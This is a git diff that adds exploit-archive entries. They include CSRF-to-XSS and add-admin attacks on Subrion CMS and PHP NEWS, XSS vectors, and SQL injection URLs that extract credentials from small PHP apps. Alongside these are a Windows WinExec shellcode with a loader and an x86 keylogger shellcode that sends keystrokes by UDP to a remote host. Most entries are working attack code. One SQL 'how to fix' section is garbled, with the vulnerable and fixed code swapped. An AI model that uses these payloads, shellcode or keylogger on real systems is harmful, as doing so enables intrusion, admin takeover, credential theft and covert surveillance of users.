+ + + + +* Thanks to Besim * \ No newline at end of file diff --git a/platforms/php/webapps/40553.txt b/platforms/php/webapps/40553.txt new file mode 100755 index 000000000..314abbcda --- /dev/null +++ b/platforms/php/webapps/40553.txt @@ -0,0 +1,249 @@ +# Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin +# Date: 15-10-2016 +# Software Link: http://www.subrion.org/download/ +# Vendor: http://www.subrion.org +# Google Dork: "Powered by Subrion CMS" +# Exploit Author: Ahsan Tahir +# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial +# Website: www.ahsantahir.net +# Category: webapps +# Version: 4.0.5 +# Tested on: [Kali Linux 2.0 | Windows 8.1] +# Email: mrahsan1337@gmail.com + +[+] CSRF bypass to Persistent XSS + +1. Description + +There was an Anti-CSRF token while adding a post in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter +the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed +means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website, +a blog post will be created with a tag like this: "" and now the XSS can be executed +here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/ + +2. Proof of Concept (CSRF to Persistent XSS) + +Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new post named +"Hacked by Ahsan" will be created, with a tag "", means that we exploited +CSRF sucessfully! + +XSS will execute here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/ + +[!] PoC Code: + + + + + +
+ +
+ + + +---------------------------------------------------------------------------------------------------------------------- + +[+] Add-Admin CSRF + +1. Description + +There was an Anti-CSRF token while adding an admin in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter +the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed +means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website, +a new admin will be created with an email which is controled by attacker, means now the attacker have full administration over the +Subrion CMS Blog! + +2. Proof of Concept + +Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new admin named +"Haxor" will be created, with email "ahsan@ahsan.py", means that we exploited the CSRF sucessfully, and now the attacker +has full control over the subrion blog! + +[!] PoC Code: + + + + + +
+ +
+ + + +Credits & Authors: +================== +Ahsan Tahir - [https://twitter.com/AhsanTahirAT] \ No newline at end of file diff --git a/platforms/php/webapps/40554.txt b/platforms/php/webapps/40554.txt new file mode 100755 index 000000000..f6a60dde8 --- /dev/null +++ b/platforms/php/webapps/40554.txt @@ -0,0 +1,75 @@ +# Exploit Title: PHP Image Database - Multiple Vulnerabilities +# Date: 2016-10-16 +# Exploit Author: larrycompress +# Contact: larrycompress@gmail.com +# Type: webapps +# Platform: PHP +# Vendor Homepage: http://www.pagereactions.com/product.php?pku=3 +# Software Link: http://www.pagereactions.com/downloads/phpimagedatabase.zip +---------------------------------------------------------------------------- + +POC as follows : + +# 0x00 Reflected XSS + +--- + +1.In public search : + +http://192.168.1.112/phpimagedatabase/index.php?dateyear=&key= + +2.In administration web interface (need normal user login) : + +http://192.168.1.112/phpimagedatabase/administration.php?dateyear=&key= + + +# 0x01 Stored XSS + +--- + +1.In administration web images interface (need normal user login) : + +http://192.168.1.112/phpimagedatabase/administration.php +?pageaction=newimage +&MAX_FILE_SIZE=1000000 +&subaction=submit +&dateday=16 +&datemonthnewedit=10 +&dateyearnewedit=2016 +&title= +&caption= +&keywordtags= +&photographer= +&categorynewedit= +&publish=active + +2.In administration web categories interface (need administrator user login) : + +http://192.168.1.112/phpimagedatabase/administration.php?pageaction=newcategory&subaction=submit&categoryname= +
+ + + + + + + + +
+ + + + +* Thanks to Besim * \ No newline at end of file diff --git a/platforms/php/webapps/40555.txt b/platforms/php/webapps/40555.txt new file mode 100755 index 000000000..ffd6680e3 --- /dev/null +++ b/platforms/php/webapps/40555.txt @@ -0,0 +1,51 @@ +# Exploit Title.............. Simple Shopping Cart Application SQL Injection +# Google Dork................ inurl:"product-details.php?prodid=" "Designed by FBC Students" +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/tyron69/ecommerce_0.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in shop/product-details.php +------------------------------- + +----snip---- + + $prodID = intval($_GET['prodid']); + + if(!empty($prodID)){ + $sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error()); + $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); + $prodname= $getProdInfo["Product"]; + +----snip---- + + +Example exploitation +-------------------- +http://server/shop/product-details.php?prodid=-80%27%20union%20select%201,2,concat(username,0x3a,password),4,version(),user()%20from%20user--+ + + +How to fix +---------- +Simple method's use the php function intval. +For example + + $prodID = $_GET['prodid']; + + if(!empty($prodID)){ + $sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error()); + $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); + $prodname= $getProdInfo["Product"]; + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html +http://php.net/manual/en/function.intval.php \ No newline at end of file diff --git a/platforms/php/webapps/40557.html b/platforms/php/webapps/40557.html new file mode 100755 index 000000000..fd5510c28 --- /dev/null +++ b/platforms/php/webapps/40557.html @@ -0,0 +1,58 @@ +*========================================================================================================= +# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) +# Author: Meryem AKDOĞAN +# Google Dork: - +# Date: 16/10/2016 +# Type: webapps +# Platform : PHP +# Vendor Homepage: http://newsphp.sourceforge.net +# Software Link: https://sourceforge.net/projects/newsphp/ +# Version: 1.3.0 +*========================================================================================================= + + +DETAILS +======================================== + +PHP NEWS 1.3.0 versions is vulnerable to CSRF attack (No CSRF token in +place) meaning that if an admin user can be tricked to visit a crafted URL +created +by attacker (via spear phishing/social engineering), a form will be +submitted to (http://sitename/path/index.php) that will change admin +password. + +Once exploited, the attacker can login to the admin panel using the +username and the password he posted in the form. + + +RISK +======================================== + +Attacker can change admin password with this vulnerablity + + + +TECHNICAL DETAILS & POC +======================================== + + + + +
+ + + + + + + + +
+ + + + +======================================== diff --git a/platforms/php/webapps/40558.txt b/platforms/php/webapps/40558.txt new file mode 100755 index 000000000..753f84809 --- /dev/null +++ b/platforms/php/webapps/40558.txt @@ -0,0 +1,45 @@ +# Exploit Title.............. School Full CBT SQL Injection +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/node/9859 +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/fimo4real1992/cbt_by_ajijola_femi.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in /show.php +------------------------------- + +----snip---- + +$get = $_GET['show']; + $result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error()); + +----snip---- + + +Example exploitation +-------------------- + +http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+ + + +How to fix +---------- +Simple method's use the php function intval. +For example + +$get = intval($_GET['show']); + $result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error()); + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/node/9859 +http://php.net/manual/en/function.intval.php \ No newline at end of file diff --git a/platforms/php/webapps/40559.txt b/platforms/php/webapps/40559.txt new file mode 100755 index 000000000..573e4279a --- /dev/null +++ b/platforms/php/webapps/40559.txt @@ -0,0 +1,85 @@ +# Exploit Title: PHP Business Directory - Multiple Vulnerabilities +# Date: 2016-10-16 +# Exploit Author: larrycompress +# Contact: larrycompress@gmail.com +# Type: webapps +# Platform: PHP +# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4 +# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip +-------------------------------------------------------------------------------- + +POC as follows : + +# 0x00 Reflected XSS + +--- + +1.In public search : + +http://192.168.1.112/phpbusinessdirectory/index.php?key=&location= + +2.In administration web interface (need normal user login) : + +http://192.168.1.112/phpbusinessdirectory/administration.php?key=&location= + +# 0x01 Stored XSS + +--- + +1.In administration web directory interface (need normal user login) : + +http://192.168.1.112/phpbusinessdirectory/administration.php +?pageaction=newsavebusiness +&subaction=submit +&businessname= +&slogan= +&businesslicence= +&address= +&city= +&suburb= +&businessstate= +&country= +&zippostcode= +&telephone2= +&mobilecell= +&fax= +&email= +&website= +&socialmedia1= +&socialmedia2= +&socialmedia3= +&productservice= +&manager= +&paymentsaccepted= + +2.In administration web categories interface (need administrator user login) : + +http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname= +
+ + + + + + + + +
+ + + + +* Thanks to Besim * \ No newline at end of file diff --git a/platforms/win_x86-64/shellcode/40549.c b/platforms/win_x86-64/shellcode/40549.c new file mode 100755 index 000000000..d65d9d046 --- /dev/null +++ b/platforms/win_x86-64/shellcode/40549.c @@ -0,0 +1,144 @@ +/* + # Title : Windows x64 WinExec() shellcode + # Date : 15-10-2016 + # Author : Roziul Hasan Khan Shifat + # size : 93 bytes + # Tested on : Windows 7 Ultimate x64 +*/ + + +/* +Disassembly of section .text: + +0000000000000000 <_start>: + 0: 99 cltd + 1: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax + 6: 48 8b 40 18 mov 0x18(%rax),%rax + a: 48 8b 70 10 mov 0x10(%rax),%rsi + e: 48 ad lods %ds:(%rsi),%rax + 10: 48 8b 30 mov (%rax),%rsi + 13: 48 8b 7e 30 mov 0x30(%rsi),%rdi + 17: 48 31 db xor %rbx,%rbx + 1a: 48 31 f6 xor %rsi,%rsi + 1d: 8b 5f 3c mov 0x3c(%rdi),%ebx + 20: 48 01 fb add %rdi,%rbx + 23: b2 88 mov $0x88,%dl + 25: 8b 1c 13 mov (%rbx,%rdx,1),%ebx + 28: 48 01 fb add %rdi,%rbx + 2b: 8b 73 1c mov 0x1c(%rbx),%esi + 2e: 48 01 fe add %rdi,%rsi + 31: 99 cltd + 32: 66 ba 27 05 mov $0x527,%dx + 36: 8b 04 96 mov (%rsi,%rdx,4),%eax + 39: 48 01 f8 add %rdi,%rax + 3c: eb 17 jmp 55 + +000000000000003e : + 3e: 59 pop %rcx + 3f: 99 cltd + 40: 48 ff c2 inc %rdx + 43: ff d0 callq *%rax + 45: 99 cltd + 46: 66 ba 29 01 mov $0x129,%dx + 4a: 8b 04 96 mov (%rsi,%rdx,4),%eax + 4d: 48 01 f8 add %rdi,%rax + 50: 48 31 c9 xor %rcx,%rcx + 53: ff d0 callq *%rax + +0000000000000055 : + 55: e8 e4 ff ff ff callq 3e + 5a: 63 6d 64 movslq 0x64(%rbp),%ebp + ... +*/ + + +/* +bits 64 +section .text + global _start +_start: + + +cdq +mov rax,[gs:rdx+0x60] ;PEB +mov rax,[rax+0x18] ;PEB.Ldr +mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList +lodsq +mov rsi,[rax] +mov rdi,[rsi+0x30] ;kernel32.dll base address + + +xor rbx,rbx +xor rsi,rsi + + +mov ebx,[rdi+0x3c] ;elf_anew +add rbx,rdi ;PE HEADER +mov dl,0x88 +mov ebx,[rbx+rdx] ;DataDirectory->VirtualAddress +add rbx,rdi ;IMAGE_EXPORT_DIRECTORY + +mov esi,[rbx+0x1c] ;AddressOfFunctions +add rsi,rdi + + +cdq + +mov dx,1319 ;Ordinal of WinExec() + + + + + +mov eax,[rsi+rdx*4] +add rax,rdi ;rax=WinExec() + + +;WinExec("cmd",1) + + +jmp c + +exec: +pop rcx +cdq +inc rdx +call rax + + +cdq +mov dx,297 + +mov eax,[rsi+rdx*4] +add rax,rdi ;rax=FatalExit() + +;FatalExit(0) + +xor rcx,rcx +call rax + + + +c: + +call exec +db 'cmd',0,0 +*/ + + +#include +#include +#include + + +char shellcode[]="\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x48\x31\xdb\x48\x31\xf6\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x66\xba\x27\x05\x8b\x04\x96\x48\x01\xf8\xeb\x17\x59\x99\x48\xff\xc2\xff\xd0\x99\x66\xba\x29\x01\x8b\x04\x96\x48\x01\xf8\x48\x31\xc9\xff\xd0\xe8\xe4\xff\xff\xff\x63\x6d\x64"; + + +main() +{ + int len=strlen(shellcode); + DWORD l=0; + printf("shellcode length %d bytes\n",len ); + VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l); + (* (int(*)()) shellcode ) (); +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40560.asm b/platforms/win_x86/shellcode/40560.asm new file mode 100755 index 000000000..699010522 --- /dev/null +++ b/platforms/win_x86/shellcode/40560.asm @@ -0,0 +1,266 @@ +; Exploit Title: x86 windows shellcode - keylogger reverse udp - 493 bytes +; Date: Fri Oct 13 12:58:35 GMT 2016 +; Exploit Author: Fugu +; Vendor Homepage: www.microsoft.com +; Version: all win +; Tested on: Windows 7(x86), 8.1(x86), 10(x86_64) +; Note: it will write to single byte payload udp packets to host. +; keystrokes are written in format: "Virtual-Key Codes", from +; msdn.microsoft.com website + +section .bss + +section .data + +section .text + global _start + _start: + cld ; 00000000 FC + call dword loc_88h ; 00000001 E882000000 + pushad ; 00000006 60 + mov ebp,esp ; 00000007 89E5 + xor eax,eax ; 00000009 31C0 + mov edx,[fs:eax+0x30] ; 0000000B 648B5030 + mov edx,[edx+0xc] ; 0000000F 8B520C + mov edx,[edx+0x14] ; 00000012 8B5214 +loc_15h: + mov esi,[edx+0x28] ; 00000015 8B7228 + movzx ecx,word [edx+0x26] ; 00000018 0FB74A26 + xor edi,edi ; 0000001C 31FF +loc_1eh: + lodsb ; 0000001E AC + cmp al,0x61 ; 0000001F 3C61 + jl loc_25h ; 00000021 7C02 + sub al,0x20 ; 00000023 2C20 +loc_25h: + ror edi,byte 0xd ; 00000025 C1CF0D + add edi,eax ; 00000028 01C7 + loop loc_1eh ; 0000002A E2F2 + push edx ; 0000002C 52 + push edi ; 0000002D 57 + mov edx,[edx+0x10] ; 0000002E 8B5210 + mov ecx,[edx+0x3c] ; 00000031 8B4A3C + mov ecx,[ecx+edx+0x78] ; 00000034 8B4C1178 + jecxz loc_82h ; 00000038 E348 + add ecx,edx ; 0000003A 01D1 + push ecx ; 0000003C 51 + mov ebx,[ecx+0x20] ; 0000003D 8B5920 + add ebx,edx ; 00000040 01D3 + mov ecx,[ecx+0x18] ; 00000042 8B4918 +loc_45h: + jecxz loc_81h ; 00000045 E33A + dec ecx ; 00000047 49 + mov esi,[ebx+ecx*4] ; 00000048 8B348B + add esi,edx ; 0000004B 01D6 + xor edi,edi ; 0000004D 31FF +loc_4fh: + lodsb ; 0000004F AC + ror edi,byte 0xd ; 00000050 C1CF0D + add edi,eax ; 00000053 01C7 + cmp al,ah ; 00000055 38E0 + jnz loc_4fh ; 00000057 75F6 + add edi,[ebp-0x8] ; 00000059 037DF8 + cmp edi,[ebp+0x24] ; 0000005C 3B7D24 + jnz loc_45h ; 0000005F 75E4 + pop eax ; 00000061 58 + mov ebx,[eax+0x24] ; 00000062 8B5824 + add ebx,edx ; 00000065 01D3 + mov cx,[ebx+ecx*2] ; 00000067 668B0C4B + mov ebx,[eax+0x1c] ; 0000006B 8B581C + add ebx,edx ; 0000006E 01D3 + mov eax,[ebx+ecx*4] ; 00000070 8B048B + add eax,edx ; 00000073 01D0 + mov [esp+0x24],eax ; 00000075 89442424 + pop ebx ; 00000079 5B + pop ebx ; 0000007A 5B + popad ; 0000007B 61 + pop ecx ; 0000007C 59 + pop edx ; 0000007D 5A + push ecx ; 0000007E 51 + jmp eax ; 0000007F FFE0 +loc_81h: + pop edi ; 00000081 5F +loc_82h: + pop edi ; 00000082 5F + pop edx ; 00000083 5A + mov edx,[edx] ; 00000084 8B12 + jmp short loc_15h ; 00000086 EB8D +loc_88h: + pop ebp ; 00000088 5D + push dword 0x3233 ; 00000089 6833320000 + push dword 0x5f327377 ; 0000008E 687773325F + push esp ; 00000093 54 + push dword 0x726774c ; 00000094 684C772607 + call ebp ; 00000099 FFD5 + mov eax,0x190 ; 0000009B B890010000 + sub esp,eax ; 000000A0 29C4 + push esp ; 000000A2 54 + push eax ; 000000A3 50 + push dword 0x6b8029 ; 000000A4 6829806B00 + call ebp ; 000000A9 FFD5 + push byte +0x10 ; 000000AB 6A10 + jmp dword loc_1ceh ; 000000AD E91C010000 +loc_b2h: + push dword 0x803428a9 ; 000000B2 68A9283480 + call ebp ; 000000B7 FFD5 + lea esi,[eax+0x1c] ; 000000B9 8D701C + xchg esi,esp ; 000000BC 87F4 + pop eax ; 000000BE 58 + xchg esp,esi ; 000000BF 87E6 + mov esi,eax ; 000000C1 89C6 + push dword 0x6c6c ; 000000C3 686C6C0000 + push dword 0x642e7472 ; 000000C8 6872742E64 + push dword 0x6376736d ; 000000CD 686D737663 + push esp ; 000000D2 54 + push dword 0x726774c ; 000000D3 684C772607 + call ebp ; 000000D8 FFD5 + jmp dword loc_1e3h ; 000000DA E904010000 +loc_dfh: + push dword 0xd1ecd1f ; 000000DF 681FCD1E0D + call ebp ; 000000E4 FFD5 + xchg ah,al ; 000000E6 86E0 + ror eax,byte 0x10 ; 000000E8 C1C810 + inc eax ; 000000EB 40 + inc eax ; 000000EC 40 + push esi ; 000000ED 56 + push eax ; 000000EE 50 + mov esi,esp ; 000000EF 89E6 + xor eax,eax ; 000000F1 31C0 + push eax ; 000000F3 50 + push eax ; 000000F4 50 + push eax ; 000000F5 50 + push eax ; 000000F6 50 + inc eax ; 000000F7 40 + inc eax ; 000000F8 40 + push eax ; 000000F9 50 + push eax ; 000000FA 50 + push dword 0xe0df0fea ; 000000FB 68EA0FDFE0 + call ebp ; 00000100 FFD5 + mov edi,eax ; 00000102 89C7 +loc_104h: + push byte +0x10 ; 00000104 6A10 + push esi ; 00000106 56 + push edi ; 00000107 57 + push dword 0x6174a599 ; 00000108 6899A57461 + call ebp ; 0000010D FFD5 + test eax,eax ; 0000010F 85C0 + jz loc_122h ; 00000111 740F + dec dword [esi+0x8] ; 00000113 FF4E08 + jnz loc_104h ; 00000116 75EC + xor eax,eax ; 00000118 31C0 + push eax ; 0000011A 50 + push dword 0x56a2b5f0 ; 0000011B 68F0B5A256 + call ebp ; 00000120 FFD5 +loc_122h: + push dword 0x3233 ; 00000122 6833320000 + push dword 0x72657375 ; 00000127 6875736572 + push esp ; 0000012C 54 + push dword 0x726774c ; 0000012D 684C772607 + call ebp ; 00000132 FFD5 + push dword 0x657461 ; 00000134 6861746500 + push dword 0x74537965 ; 00000139 6865795374 + push dword 0x4b746547 ; 0000013E 684765744B + push esp ; 00000143 54 + push eax ; 00000144 50 + push dword 0x7802f749 ; 00000145 6849F70278 + call ebp ; 0000014A FFD5 + push esi ; 0000014C 56 + push edi ; 0000014D 57 + push eax ; 0000014E 50 + xor ecx,ecx ; 0000014F 31C9 + mov esi,ecx ; 00000151 89CE + mov cl,0x8 ; 00000153 B108 +loc_155h: + push esi ; 00000155 56 + loop loc_155h ; 00000156 E2FD +loc_158h: + xor ecx,ecx ; 00000158 31C9 + xor esi,esi ; 0000015A 31F6 + push byte +0x8 ; 0000015C 6A08 + push dword 0xe035f044 ; 0000015E 6844F035E0 + call ebp ; 00000163 FFD5 +loc_165h: + mov eax,esi ; 00000165 89F0 + cmp al,0xff ; 00000167 3CFF + jnc loc_158h ; 00000169 73ED + inc esi ; 0000016B 46 + push esi ; 0000016C 56 + call dword [esp+0x24] ; 0000016D FF542424 + mov edx,esi ; 00000171 89F2 + xor ecx,ecx ; 00000173 31C9 + mov cl,0x80 ; 00000175 B180 + and eax,ecx ; 00000177 21C8 + xor ecx,ecx ; 00000179 31C9 + cmp eax,ecx ; 0000017B 39C8 + jnz loc_18fh ; 0000017D 7510 + xor edx,edx ; 0000017F 31D2 + mov ecx,edx ; 00000181 89D1 + mov eax,esi ; 00000183 89F0 + mov cl,0x20 ; 00000185 B120 + div ecx ; 00000187 F7F1 + btr [esp+eax*4],edx ; 00000189 0FB31484 + jmp short loc_165h ; 0000018D EBD6 +loc_18fh: + xor edx,edx ; 0000018F 31D2 + mov ecx,edx ; 00000191 89D1 + mov eax,esi ; 00000193 89F0 + mov cl,0x20 ; 00000195 B120 + div ecx ; 00000197 F7F1 + bt [esp+eax*4],edx ; 00000199 0FA31484 + jc loc_165h ; 0000019D 72C6 + xor edx,edx ; 0000019F 31D2 + mov ecx,edx ; 000001A1 89D1 + mov eax,esi ; 000001A3 89F0 + mov cl,0x20 ; 000001A5 B120 + div ecx ; 000001A7 F7F1 + bts [esp+eax*4],edx ; 000001A9 0FAB1484 + push esi ; 000001AD 56 + push byte +0x10 ; 000001AE 6A10 + push dword [esp+0x30] ; 000001B0 FF742430 + push byte +0x0 ; 000001B4 6A00 + push byte +0x1 ; 000001B6 6A01 + lea ecx,[esp+0x10] ; 000001B8 8D4C2410 + push ecx ; 000001BC 51 + push dword [esp+0x3c] ; 000001BD FF74243C + push dword 0xdf5c9d75 ; 000001C1 68759D5CDF + call ebp ; 000001C6 FFD5 + lea esp,[esp+0x4] ; 000001C8 8D642404 + jmp short loc_158h ; 000001CC EB8A +loc_1ceh: + call dword loc_b2h ; 000001CE E8DFFEFFFF + db "www.example.com",0 +loc_1e3h: + call dword loc_dfh + db "4444",0 + +;"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b" +;"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c" +;"\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" +;"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20" +;"\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac" +;"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" +;"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +;"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" +;"\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77" +;"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00" +;"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x10\xe9\x1c\x01" +;"\x00\x00\x68\xa9\x28\x34\x80\xff\xd5\x8d\x70\x1c\x87\xf4\x58\x87" +;"\xe6\x89\xc6\x68\x6c\x6c\x00\x00\x68\x72\x74\x2e\x64\x68\x6d\x73" +;"\x76\x63\x54\x68\x4c\x77\x26\x07\xff\xd5\xe9\x04\x01\x00\x00\x68" +;"\x1f\xcd\x1e\x0d\xff\xd5\x86\xe0\xc1\xc8\x10\x40\x40\x56\x50\x89" +;"\xe6\x31\xc0\x50\x50\x50\x50\x40\x40\x50\x50\x68\xea\x0f\xdf\xe0" +;"\xff\xd5\x89\xc7\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85" +;"\xc0\x74\x0f\xff\x4e\x08\x75\xec\x31\xc0\x50\x68\xf0\xb5\xa2\x56" +;"\xff\xd5\x68\x33\x32\x00\x00\x68\x75\x73\x65\x72\x54\x68\x4c\x77" +;"\x26\x07\xff\xd5\x68\x61\x74\x65\x00\x68\x65\x79\x53\x74\x68\x47" +;"\x65\x74\x4b\x54\x50\x68\x49\xf7\x02\x78\xff\xd5\x56\x57\x50\x31" +;"\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08\x68\x44" +;"\xf0\x35\xe0\xff\xd5\x89\xf0\x3c\xff\x73\xed\x46\x56\xff\x54\x24" +;"\x24\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31" +;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31" +;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31" +;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x56\x6a\x10" +;"\xff\x74\x24\x30\x6a\x00\x6a\x01\x8d\x4c\x24\x10\x51\xff\x74\x24" +;"\x3c\x68\x75\x9d\x5c\xdf\xff\xd5\x8d\x64\x24\x04\xeb\x8a\xe8\xdf" +;"\xfe\xff\xff\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63" +;"\x6f\x6d\x00\xe8\xf7\xfe\xff\xff\x34\x34\x34\x34\x00" \ No newline at end of file diff --git a/platforms/windows/dos/40536.py b/platforms/windows/dos/40536.py new file mode 100755 index 000000000..0c86cf721 --- /dev/null +++ b/platforms/windows/dos/40536.py @@ -0,0 +1,147 @@ + + +''' +#Hi guys +#Title: Firefox 49.0.1 crash Denial of Service +#Date: 15 Oct 2016 +#Author: sultan albalawi +#video: https://www.facebook.com/pentest3/videos/vb.100012552940568/199310163830747/?type=2&theater +#Tested on:win7 +#Open link in firefox +#Double click on the Click You will see the report that there are crach + +#thanks +......................................................................... +''' + +from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer +import subprocess,string +host='192.168.100.3' +port=6060 +ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20' +ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d' +ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20' +ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20' +ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74' +ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a' +ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20' +ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e' +ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50' +ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27' +ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d' +ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a' +ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20' +ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20' +ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d' +ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20' +ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20' 